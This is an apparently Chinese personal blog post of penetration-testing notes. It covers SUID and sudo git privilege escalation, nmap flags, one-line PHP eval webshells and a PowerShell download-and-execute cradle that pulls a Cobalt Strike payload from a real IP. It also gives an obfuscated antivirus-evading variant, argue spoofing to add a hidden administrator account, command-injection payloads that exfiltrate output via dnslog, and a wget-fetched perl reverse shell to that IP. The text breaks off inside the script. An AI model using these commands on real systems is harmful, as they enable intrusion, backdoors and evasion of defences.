<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"ithedogl.github.io","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="暴戾和痛楚很安静，悲伤像泥沼">
<meta property="og:type" content="article">
<meta property="og:title" content="杂记">
<meta property="og:url" content="https://ithedogl.github.io/2022/01/18/%E6%9D%82%E8%AE%B0/index.html">
<meta property="og:site_name" content="沉沦">
<meta property="og:description" content="暴戾和痛楚很安静，悲伤像泥沼">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://ithedogl.github.io/images/%E6%9D%82%E8%AE%B0/image-20201227223931206.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E6%9D%82%E8%AE%B0/image-20201228154827601.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E6%9D%82%E8%AE%B0/image-20201228155017753.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E6%9D%82%E8%AE%B0/image-20201228155246095.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E6%9D%82%E8%AE%B0/image-20201228155411605.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E6%9D%82%E8%AE%B0/image-20201229160026533.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E6%9D%82%E8%AE%B0/image-20201229160329704.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E6%9D%82%E8%AE%B0/image-20201229161259258.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E6%9D%82%E8%AE%B0/image-20201231094636166.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E6%9D%82%E8%AE%B0/image-20201231095338168.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E6%9D%82%E8%AE%B0/image-20201231095405841.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E6%9D%82%E8%AE%B0/image-20201231095656161.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E6%9D%82%E8%AE%B0/image-20201231095737090.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E6%9D%82%E8%AE%B0/image-20210313183346415.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E6%9D%82%E8%AE%B0/image-20210313183601293.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E6%9D%82%E8%AE%B0/image-20220117160338430.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E6%9D%82%E8%AE%B0/image-20220117160626913.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E6%9D%82%E8%AE%B0/image-20220117162706080.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E6%9D%82%E8%AE%B0/image-20220118140702198.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E6%9D%82%E8%AE%B0/image-20220118141934237.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E6%9D%82%E8%AE%B0/image-20220219115213855.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E6%9D%82%E8%AE%B0/image-20220211170424359.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E6%9D%82%E8%AE%B0/image-20220211170500038.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E6%9D%82%E8%AE%B0/image-20220211170656817.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E6%9D%82%E8%AE%B0/image-20220211170742008.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E6%9D%82%E8%AE%B0/image-20220211173312818.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E6%9D%82%E8%AE%B0/image-20220211222704426.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E6%9D%82%E8%AE%B0/image-20220211221651034.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E6%9D%82%E8%AE%B0/image-20220211221908920.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E6%9D%82%E8%AE%B0/image-20220211223751182.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E6%9D%82%E8%AE%B0/image-20220309102225352.png">
<meta property="article:published_time" content="2022-01-18T05:56:00.095Z">
<meta property="article:modified_time" content="2022-03-09T02:22:28.055Z">
<meta property="article:author" content="thedog">
<meta property="article:tag" content="杂记">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://ithedogl.github.io/images/%E6%9D%82%E8%AE%B0/image-20201227223931206.png">

<link rel="canonical" href="https://ithedogl.github.io/2022/01/18/%E6%9D%82%E8%AE%B0/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>杂记 | 沉沦</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">沉沦</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://ithedogl.github.io/2022/01/18/%E6%9D%82%E8%AE%B0/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="thedog">
      <meta itemprop="description" content="笑一个">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="沉沦">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          杂记
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2022-01-18 13:56:00" itemprop="dateCreated datePublished" datetime="2022-01-18T13:56:00+08:00">2022-01-18</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2022-03-09 10:22:28" itemprop="dateModified" datetime="2022-03-09T10:22:28+08:00">2022-03-09</time>
              </span>

          
  
  <span class="post-meta-item">
    
      <span class="post-meta-item-icon">
        <i class="far fa-comment"></i>
      </span>
      <span class="post-meta-item-text">Valine：</span>
    
    <a title="valine" href="/2022/01/18/%E6%9D%82%E8%AE%B0/#valine-comments" itemprop="discussionUrl">
      <span class="post-comments-count valine-comment-count" data-xid="/2022/01/18/%E6%9D%82%E8%AE%B0/" itemprop="commentCount"></span>
    </a>
  </span>
  
  
            <div class="post-description">暴戾和痛楚很安静，悲伤像泥沼</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h2 id="searchsploit"><a href="#searchsploit" class="headerlink" title="searchsploit"></a>searchsploit</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">searchsploit app version</span><br></pre></td></tr></table></figure>

<p>kali上用于搜索漏洞的命令，后面可以直接跟框架、协议、系统及版本等来搜索相应的漏洞，如【searchsploit thinkphp/smb/ubuntu 16.04】</p>
<h2 id="suid提权"><a href="#suid提权" class="headerlink" title="suid提权"></a>suid提权</h2><p>SUID是Linux的一种权限机制，具有这种权限的文件会在其执行时，使调用者暂时获得该文件拥有者的权限。如果拥有SUID权限，那么就可以利用系统中的二进制文件和工具来进行root提权。</p>
<p>已知的可用来提权的linux可行性的文件列表如下：</p>
<ul>
<li>Nmap</li>
<li>Vim</li>
<li>find</li>
<li>Bash</li>
<li>More</li>
<li>Less</li>
<li>Nano</li>
<li>cp</li>
</ul>
<p>以下命令可以发现系统上运行的所有SUID可执行文件。具体来说，命令将尝试查找具有root权限的SUID的文件。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">find &#x2F; -user root -perm -4000 -print 2&gt;&#x2F;dev&#x2F;null</span><br><span class="line">find &#x2F; -perm -u&#x3D;s -type f 2&gt;&#x2F;dev&#x2F;null</span><br><span class="line">find &#x2F; -user root -perm -4000 -exec ls -ldb &#123;&#125; \;</span><br></pre></td></tr></table></figure>

<p>例如如果Find命令也是以Suid权限运行的话，则将通过find执行的所有命令都会以root权限执行。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">touch pentestlab</span><br><span class="line">find pentestlab -exec whoami \;</span><br></pre></td></tr></table></figure>





<h2 id="nmap部分参数"><a href="#nmap部分参数" class="headerlink" title="nmap部分参数"></a>nmap部分参数</h2><p> -sn：#ping探测扫描主机， 不进行端口扫描 ，当对方打开防火墙无法ping通时，就发现不了该存活主机。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap -sn 192.168.5.0&#x2F;24</span><br></pre></td></tr></table></figure>

<p>-sP:通过arp包来确认主机是否存活，即使无法ping通，也能确认存活。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap -sP 192.168.5.0&#x2F;24</span><br></pre></td></tr></table></figure>

<p>nmap端口扫描</p>
<p>-sS:</p>
<p>使用频率最高的扫描选项：SYN扫描，又称为半开放扫描，它不打开一个完全的TCP连接，执行得很快，效率高<br>（一个完整的tcp连接需要3次握手，而-sS选项不需要3次握手）<br>Tcp SYN Scan (sS) 它被称为半开放扫描<br>优点：Nmap发送SYN包到远程主机，但是它不会产生任何会话，目标主机几乎不会把连接记入系统日志。（防止对方判断为扫描攻击），扫描速度快，效率高，在工作中使用频率最高<br>缺点：它需要root/administrator权限执行</p>
<p>-Pn:默认目标存活，当确认目标存活但无法ping通可以使用</p>
<p>-A：获取版本等详细信息</p>
<p>-p-    ：扫描0-65535端口</p>
<h2 id="echo命令写马"><a href="#echo命令写马" class="headerlink" title="echo命令写马"></a>echo命令写马</h2><p>windows：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">echo ^&lt;?php @eval($_POST[cmd]);?^&gt; &gt; .&#x2F;iii.txt</span><br></pre></td></tr></table></figure>

<p>linux：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;&lt;?php @eval(\$_POST[&#39;cmd&#39;]); ?&gt;&quot; &gt; .&#x2F;1.php</span><br></pre></td></tr></table></figure>



<h2 id="其他"><a href="#其他" class="headerlink" title="其他"></a>其他</h2><p>wpscan    kali上用于渗透wordpress的工具，支持爆破账密和漏洞扫描等</p>
<p>joomscan    kali上用于渗透joomla的工具，可扫描出版本、后台等信息</p>
<p>rbash：受限制的shell，部分命令无法执行，linux的一种安全措施。对应的技术为rbash逃逸，指拜托限制，类似于越权。</p>
<p>比如dc2靶机使用环境变量来进行rbash逃逸。</p>
<h2 id="git提权"><a href="#git提权" class="headerlink" title="git提权"></a>git提权</h2><p>原理是git存在缓冲区溢出漏洞，在使用下面两种方法时，不需要输入root密码即可以root权限执行这条命令。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">两种方法</span><br><span class="line">1、sudo git help config</span><br><span class="line">在末行命令模式输入  !&#x2F;bin&#x2F;bash 或 !&#39;sh&#39; 完成提权</span><br><span class="line">2、sudo git -p help</span><br><span class="line">      !&#x2F;bin&#x2F;bash</span><br></pre></td></tr></table></figure>



<h2 id="john"><a href="#john" class="headerlink" title="john"></a>john</h2><p>john the ripper：简称john，密码破解器，可以直接把hash值保存在文件中，使用命令【john 哈希文件】进行破解，如遇提示<strong>No password hashes loaded</strong>需重新编译【make clean linux-x86-64】</p>
<h2 id="判断站库分离"><a href="#判断站库分离" class="headerlink" title="判断站库分离"></a>判断站库分离</h2><p>mssql数据库是否站库分离：</p>
<p>假设a是数据库服务器，b是对应的网站服务器，如果b网站存在mssql注入。</p>
<p>【select @@servername;】返回数据库服务器计算机名称</p>
<p>【select host_name();】返回网站服务器计算机名称</p>
<p>如果不一样就是站库分离</p>
<p>当站库分离时，通过–os-shell获得的shell是数据库服务器上的shell，而非网站服务器上的shell</p>
<h2 id="windows系统上查找网站路径"><a href="#windows系统上查找网站路径" class="headerlink" title="windows系统上查找网站路径"></a>windows系统上查找网站路径</h2><p>【dir /s /b c:\test.txt】即查找c盘下含有test.txt文件的路径，不支持模糊查询</p>
<p>/s      显示指定目录和所有子目录中的文件。</p>
<p>/b    使用空格式(没有标题信息或摘要)。</p>
<p>要查找网站路径可以在网站上找到一个特殊的文件名，然后在几个盘符依次执行命令尝试。</p>
<p><img src="/../../../../images/%E6%9D%82%E8%AE%B0/image-20201227223931206.png" alt="image-20201227223931206"></p>
<h2 id="powershell"><a href="#powershell" class="headerlink" title="powershell"></a>powershell</h2><p>powershell在win7和winserver2008后才有</p>
<p>PowerShell的默认配置是不允许执行脚本文件的，具有保护策略，网上有多种绕过方式。</p>
<p><img src="/../../../../images/%E6%9D%82%E8%AE%B0/image-20201228154827601.png" alt="image-20201228154827601"></p>
<p>比如【powershell.exe -ExecutionPolicy Bypass -File .\payload.ps1】就可以绕过执行</p>
<p>或者powershell中【set-ExecutionPolicy RemoteSigned】选y后也可以执行</p>
<p><img src="/../../../../images/%E6%9D%82%E8%AE%B0/image-20201228155017753.png" alt="image-20201228155017753"></p>
<p>下面介绍使用powershell进行cs上线，cs上生成ps1脚本，然后上传到web服务器上保证可以访问到，再执行命令</p>
<p>【powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘<a target="_blank" rel="noopener" href="http://47.52.31.161:8080/ps1&#39;))&quot;%E3%80%91">http://47.52.31.161:8080/ps1&#39;))&quot;】</a></p>
<p><img src="/../../../../images/%E6%9D%82%E8%AE%B0/image-20201228155246095.png" alt="image-20201228155246095"></p>
<p><img src="/../../../../images/%E6%9D%82%E8%AE%B0/image-20201228155411605.png" alt="image-20201228155411605"></p>
<p>调用powershell不产生警告。可以通过Invoke-Obfuscation编码静态免杀，杀软检测不会警告，但是上线会被杀软发现阻止，生成的dll文件被发现。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">powershell set-alias -name kaspersky -value Invoke-Expression;&quot;$a1&#x3D;&#39;kaspersky ((new-object net.webclient).downl&#39;;$a2&#x3D;&#39;oadstring(&#39;&#39;http:&#x2F;&#x2F;47.52.31.161:8080&#x2F;sh1&#39;&#39;))&#39;;$a3&#x3D;$a1，$a2;kaspersky(-join $a3)&quot;</span><br></pre></td></tr></table></figure>





<h2 id="cs上argue参数绕过杀软"><a href="#cs上argue参数绕过杀软" class="headerlink" title="cs上argue参数绕过杀软"></a>cs上argue参数绕过杀软</h2><p>直接使用命令添加用户会被杀软拦截<img src="/../../../../images/%E6%9D%82%E8%AE%B0/image-20201229160026533.png" alt="image-20201229160026533"></p>
<p>可以使用argue绕过杀软添加用户【<strong>使用前提</strong>：administrator 或 system权限。】</p>
<p>第一行是进行参数污染，第二行是查看被污染的参数</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">argue net1 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx</span><br><span class="line">argue</span><br><span class="line">execute net1 user hack Root111! &#x2F;add</span><br><span class="line">execute net1 localgroup administrators hack &#x2F;add</span><br></pre></td></tr></table></figure>

<p><img src="/../../../../images/%E6%9D%82%E8%AE%B0/image-20201229160329704.png" alt="image-20201229160329704"></p>
<p>污染powershell</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">argue powershell.exe xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx</span><br></pre></td></tr></table></figure>

<p>再用execute执行powershell上线cs命令</p>
<p><img src="/../../../../images/%E6%9D%82%E8%AE%B0/image-20201229161259258.png" alt="image-20201229161259258"></p>
<h2 id="确定文件上传是白名单还是黑名单"><a href="#确定文件上传是白名单还是黑名单" class="headerlink" title="确定文件上传是白名单还是黑名单"></a>确定文件上传是白名单还是黑名单</h2><p>上传一个不存在的文件格式后缀名，如果不允许上传，就是白名单。如果允许上传，就是黑名单。</p>
<h2 id="查看机器杀软"><a href="#查看机器杀软" class="headerlink" title="查看机器杀软"></a>查看机器杀软</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wmic &#x2F;namespace:\\root\securitycenter2 path antivirusproduct GET displayName，productState， pathToSignedProductExe</span><br></pre></td></tr></table></figure>

<p><img src="/../../../../images/%E6%9D%82%E8%AE%B0/image-20201231094636166.png" alt="image-20201231094636166"></p>
<h2 id="确认是虚拟机还是物理机"><a href="#确认是虚拟机还是物理机" class="headerlink" title="确认是虚拟机还是物理机"></a>确认是虚拟机还是物理机</h2><p>linux</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">dmidecode -s system-product-name</span><br></pre></td></tr></table></figure>

<p>kali虚拟机</p>
<p><img src="/../../../../images/%E6%9D%82%E8%AE%B0/image-20201231095338168.png" alt="image-20201231095338168"></p>
<p>阿里云服务器</p>
<p><img src="/../../../../images/%E6%9D%82%E8%AE%B0/image-20201231095405841.png" alt="image-20201231095405841"></p>
<p>windows</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">systeminfo</span><br></pre></td></tr></table></figure>

<p>虚拟机</p>
<p><img src="/../../../../images/%E6%9D%82%E8%AE%B0/image-20201231095656161.png" alt="image-20201231095656161"></p>
<p>物理机</p>
<p><img src="/../../../../images/%E6%9D%82%E8%AE%B0/image-20201231095737090.png" alt="image-20201231095737090"></p>
<h2 id="命令执行和反弹shell"><a href="#命令执行和反弹shell" class="headerlink" title="命令执行和反弹shell"></a>命令执行和反弹shell</h2><p>思路：比如在某些业务系统设置ip地址的地方后面跟上<kbd>|</kbd>或<kbd>||</kbd>，后面再跟上下面的测试命令，猜测可能会ping IP。</p>
<p>或者构建上传压缩包的文件名为这个，猜测系统使用解压命令，然后参数是文件名，文件名后跟上其他的命令，以此测试命令执行漏洞。</p>
<p>windows</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ping %OS%.wwgjp6.dnslog.cn</span><br></pre></td></tr></table></figure>

<p><img src="/../../../../images/%E6%9D%82%E8%AE%B0/image-20210313183346415.png" alt="image-20210313183346415"></p>
<p>关于%OS%</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;&#x2F;变量                     类型       描述</span><br><span class="line">&#x2F;&#x2F;%ALLUSERSPROFILE%        本地       返回“所有用户”配置文件的位置。</span><br><span class="line">&#x2F;&#x2F;%APPDATA%                本地       返回默认情况下应用程序存储数据的位置。</span><br><span class="line">&#x2F;&#x2F;%CD%                     本地       返回当前目录字符串。</span><br><span class="line">&#x2F;&#x2F;%CMDCMDLINE%             本地       返回用来启动当前的 Cmd.exe 的准确命令行。</span><br><span class="line">&#x2F;&#x2F;%CMDEXTVERSION%          系统       返回当前的“命令处理程序扩展”的版本号。</span><br><span class="line">&#x2F;&#x2F;%COMPUTERNAME%           系统       返回计算机的名称。</span><br><span class="line">&#x2F;&#x2F;%COMSPEC%                系统       返回命令行解释器可执行程序的准确路径。</span><br><span class="line">&#x2F;&#x2F;%DATE%                   系统       返回当前日期。使用与 date &#x2F;t 命令相同的格式。由 Cmd.exe 生成。有关 date 命令的详细信息，请参阅 Date。</span><br><span class="line">&#x2F;&#x2F;%ERRORLEVEL%             系统       返回上一条命令的错误代码。通常用非零值表示错误。</span><br><span class="line">&#x2F;&#x2F;%HOMEDRIVE%              系统       返回连接到用户主目录的本地工作站驱动器号。基于主目录值而设置。用户主目录是在“本地用户和组”中指定的。</span><br><span class="line">&#x2F;&#x2F;%HOMEPATH%               系统       返回用户主目录的完整路径。基于主目录值而设置。用户主目录是在“本地用户和组”中指定的。</span><br><span class="line">&#x2F;&#x2F;%HOMESHARE%              系统       返回用户的共享主目录的网络路径。基于主目录值而设置。用户主目录是在“本地用户和组”中指定的。</span><br><span class="line">&#x2F;&#x2F;%LOGONSERVER%            本地       返回验证当前登录会话的域控制器的名称。</span><br><span class="line">&#x2F;&#x2F;%NUMBER_OF_PROCESSORS%   系统       指定安装在计算机上的处理器的数目。</span><br><span class="line">&#x2F;&#x2F;%OS%                     系统       返回操作系统名称。Windows 2000 显示其操作系统为 Windows_NT。</span><br><span class="line">&#x2F;&#x2F;%PATH%                   系统       指定可执行文件的搜索路径。</span><br><span class="line">&#x2F;&#x2F;%PATHEXT%                系统       返回操作系统认为可执行的文件扩展名的列表。</span><br><span class="line">&#x2F;&#x2F;%PROCESSOR_ARCHITECTURE% 系统       返回处理器的芯片体系结构。值：x86 或 IA64（基于 Itanium）。</span><br><span class="line">&#x2F;&#x2F;%PROCESSOR_IDENTFIER%    系统       返回处理器说明。</span><br><span class="line">&#x2F;&#x2F;%PROCESSOR_LEVEL%        系统       返回计算机上安装的处理器的型号。</span><br><span class="line">&#x2F;&#x2F;%PROCESSOR_REVISION%     系统       返回处理器的版本号。</span><br><span class="line">&#x2F;&#x2F;%PROMPT%                 本地       返回当前解释程序的命令提示符设置。由 Cmd.exe 生成。</span><br><span class="line">&#x2F;&#x2F;%RANDOM%                 系统       返回 0 到 32767 之间的任意十进制数字。由 Cmd.exe 生成。</span><br><span class="line">&#x2F;&#x2F;%SYSTEMDRIVE%            系统       返回包含 Windows server operating system 根目录（即系统根目录）的驱动器。</span><br><span class="line">&#x2F;&#x2F;%SYSTEMROOT%             系统       返回 Windows server operating system 根目录的位置。</span><br><span class="line">&#x2F;&#x2F;%TEMP%和%TMP%            系统和用户 返回对当前登录用户可用的应用程序所使用的默认临时目录。有些应用程序需要 TEMP，而其他应用程序则需要 TMP。</span><br><span class="line">&#x2F;&#x2F;%TIME%                   系统       返回当前时间。使用与                                                                                   time       &#x2F;t                                                                     命令相同的格式。由         Cmd.exe                  生成。有关                       time   命令的详细信息，请参阅 Time。</span><br><span class="line">&#x2F;&#x2F;%USERDOMAIN%             本地       返回包含用户帐户的域的名称。</span><br><span class="line">&#x2F;&#x2F;%USERNAME%               本地       返回当前登录的用户的名称。</span><br><span class="line">&#x2F;&#x2F;%USERPROFILE%            本地       返回当前用户的配置文件的位置。</span><br><span class="line">&#x2F;&#x2F;%WINDIR%                 系统       返回操作系统目录的位置。</span><br></pre></td></tr></table></figure>



<p>Linux</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ping &#96;whoami&#96;.wwgjp6.dnslog.cn	&#x2F;&#x2F;换成pwd其他的命令也可以</span><br></pre></td></tr></table></figure>

<p><img src="/../../../../images/%E6%9D%82%E8%AE%B0/image-20210313183601293.png" alt="image-20210313183601293"></p>
<p>用perl反弹shell。perl是linux自带的。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ping &#96;wget http:&#x2F;&#x2F;47.52.31.161&#x2F;perl.pl&#96;.70c1w4.dnslog.cn	&#x2F;&#x2F;下载perl反弹shell脚本</span><br><span class="line">ping &#96;perl perl.pl 47.52.31.161 9377&#96;.70c1w4.dnslog.cn	&#x2F;&#x2F;反弹shell。格式：perl 脚本名 ip port</span><br></pre></td></tr></table></figure>

<p>脚本内容</p>
<figure class="highlight perl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/perl -w</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">use</span> strict;</span><br><span class="line"><span class="keyword">use</span> Socket;</span><br><span class="line"><span class="keyword">use</span> IO::Handle;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>($#ARGV+<span class="number">1</span> != <span class="number">2</span>)&#123;</span><br><span class="line"><span class="keyword">print</span> <span class="string">&quot;$#ARGV $0 Remote_IP Remote_Port n&quot;</span>;</span><br><span class="line"><span class="keyword">exit</span> <span class="number">1</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span 